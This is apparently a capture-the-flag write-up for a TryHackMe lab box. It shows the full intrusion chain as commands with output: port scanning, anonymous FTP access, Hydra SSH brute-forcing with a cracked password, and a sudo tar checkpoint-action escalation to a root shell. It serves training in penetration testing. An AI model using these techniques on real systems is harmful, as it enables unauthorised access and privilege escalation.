This box had a few basic knowledge requirements. Notable:
- General enumeration
- SSH brute-forcing
- Exploiting FTP anonymous account
tarfor privilege escalation
With each of those in tow, lets get into how I completed the tasks.
1. Deploy the machine
Pretty self-explanatory. Hit the big green deploy button as you’d usually do.
2. Find all open ports on machine
nmap -A -p- target.thm -v
Scanning target.thm (10.10.237.73) [65535 ports] Discovered open port 22/tcp on 10.10.237.73 Discovered open port 21/tcp on 10.10.237.73 Discovered open port 80/tcp on 10.10.237.73
3. Who wrote the task list?
Navigate to host
- Blurb about 4 characters:
Test FTP for anon access
ftp 10.10.237.73, use username
Anonymous, with a blank password.
kali@kali:~/Desktop/TryHackMe/cowboyhacker$ ftp 10.10.237.73 Connected to 10.10.237.73. 220 (vsFTPd 3.0.3) Name (10.10.237.73:kali): Anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp>
Check files in dir, and download them
ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 ftp ftp 418 Jun 07 21:41 locks.txt -rw-rw-r-- 1 ftp ftp 68 Jun 07 21:47 task.txt 226 Directory send OK. ftp> get locks.txt local: locks.txt remote: locks.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for locks.txt (418 bytes). 226 Transfer complete. 418 bytes received in 0.06 secs (6.6875 kB/s) ftp> get task.txt local: task.txt remote: task.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for task.txt (68 bytes). 226 Transfer complete. 68 bytes received in 0.06 secs (1.1806 kB/s)
Read stolen files
locks.txt (seems like a list of passwords…)
kali@kali:~/Desktop/TryHackMe/cowboyhacker$ cat locks.txt rEddrAGON ReDdr4g0nSynd!cat3 Dr@gOn$yn9icat3 R3DDr46ONSYndIC@Te ReddRA60N R3dDrag0nSynd1c4te dRa6oN5YNDiCATE ReDDR4g0n5ynDIc4te R3Dr4gOn2044 RedDr4gonSynd1cat3 R3dDRaG0Nsynd1c@T3 Synd1c4teDr@g0n reddRAg0N REddRaG0N5yNdIc47e Dra6oN$yndIC@t3 4L1mi6H71StHeB357 rEDdragOn$ynd1c473 DrAgoN5ynD1cATE ReDdrag0n$ynd1cate Dr@gOn$yND1C4Te RedDr@gonSyn9ic47e REd$yNdIc47e dr@goN5YNd1c@73 rEDdrAGOnSyNDiCat3 r3ddr@g0N ReDSynd1ca7e
cat task.txt (the task list for the flag)
kali@kali:~/Desktop/TryHackMe/cowboyhacker$ cat task.txt 1.) Protect Vicious. 2.) Plan for Red Eye pickup on the moon. -lin
4. What service can you bruteforce with the text file found?
There were only 3 ports open on the scan, of which they’re used for the either FTP, SSH, HTTP. We could brute FTP, but we’d have less capability; HTTP, not really brutable with what we’ve uncovered so far; so SSH, seems like the best option.
5. What is the users password?
And bruteforce with
hydra -l lin -P ~/Desktop/TryHackMe/cowboyhacker/locks.txt ssh://target.thm
kali@kali:~/Desktop/TryHackMe/cowboyhacker$ hydra -l lin -P ~/Desktop/TryHackMe/cowboyhacker/locks.txt ssh://target.thm Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-09 17:51:32 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task [DATA] attacking ssh://target.thm:22/ [ssh] host: target.thm login: lin password: RedDr4gonSynd1cat3 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 1 final worker threads did not complete until end. [ERROR] 1 target did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-09 17:51:35
Revealing the password is
ssh into the box with our cracked credentials
kali@kali:~/Desktop/TryHackMe/cowboyhacker$ ssh email@example.com The authenticity of host '10.10.237.73 (10.10.237.73)' can't be established. ECDSA key fingerprint is SHA256:fzjl1gnXyEZI9px29GF/tJr+u8o9i88XXfjggSbAgbE. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.237.73' (ECDSA) to the list of known hosts. firstname.lastname@example.org's password: Permission denied, please try again. email@example.com's password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 83 packages can be updated. 0 updates are security updates. Last login: Sun Jun 7 22:23:41 2020 from 192.168.0.14 lin@bountyhacker:~/Desktop$
Then we need to find and return
lin@bountyhacker:~/Desktop$ ls user.txt lin@bountyhacker:~/Desktop$ cat user.txt
Lets assume the
root.txt is in the
/root directory and
ls it to see if we can see anything there.
lin@bountyhacker:~/Desktop$ ls /root ls: cannot open directory '/root': Permission denied
We don’t have permission, so need to find a privesc. Lets start with using
sudo -l to identify any root priviledged binaries we may have assigned.
lin@bountyhacker:~/Desktop$ sudo -l [sudo] password for lin: Matching Defaults entries for lin on bountyhacker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User lin may run the following commands on bountyhacker: (root) /bin/tar
Output shows that we can exploit
root. On reading the
/bin/tar manual with
/bin/tar --help. We can see that we can exploit
tar to fire an action on every checkpoint.
Lets ‘create’ a tar compressed archive. We’ll use
/dev/null for input and output incase of lacking permissions..
sudo tar -c /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh tar: Removing leading `/' from member names # whoami root
Successfully achieved a root shell. Lets try find that last flag.
# ls /root root.txt # cat /root/root.txt